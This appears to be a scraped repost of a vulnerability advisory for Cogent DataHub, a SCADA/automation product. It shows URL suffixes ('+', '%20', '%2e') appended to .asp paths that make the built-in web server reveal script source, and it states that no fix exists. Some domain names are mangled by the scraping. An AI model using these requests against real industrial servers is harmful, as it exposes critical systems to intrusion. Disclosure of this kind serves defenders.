好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Cogent DataHub <= 7.1.1.63代码泄露缺陷及修复 - 网站

####################################################################### 

  

  

1) Introduction 

2) Bug 

3) The Code 

4) Fix 

  

  

####################################################################### 

  

=============== 

1)概述

=============== 

  

  

DataHub is a software for the SCADA and automation sector. 

  

  

####################################################################### 

  

====== 

2)缺陷

====== 

  

  

The server/service listens on port 80 using a custom web server. 

  

Through the appending of the following chars it's possible to view the 

content of the server-side scripts on the server: 

  

  + 

  %20 

  %2e 

  

This vulnerability is useful when the server hosts customized scripts 

which seems a feature of the software:  HdhCmsTest2cto测试数据

http://HdhCmsTestcogentdatahub测试数据/Features/DataHub_Web_ASP.html

  

  

####################################################################### 

  

=========== 

3) The Code 

=========== 

  

  

http://SERVER/index.asp + 

http://SERVER/index.asp%20

http://SERVER/index.asp%2e

  

  

####################################################################### 

  

====== 

4) Fix 

====== 

  

  

No fix. 

查看更多关于Cogent DataHub <= 7.1.1.63代码泄露缺陷及修复 - 网站的详细内容...

  阅读:44次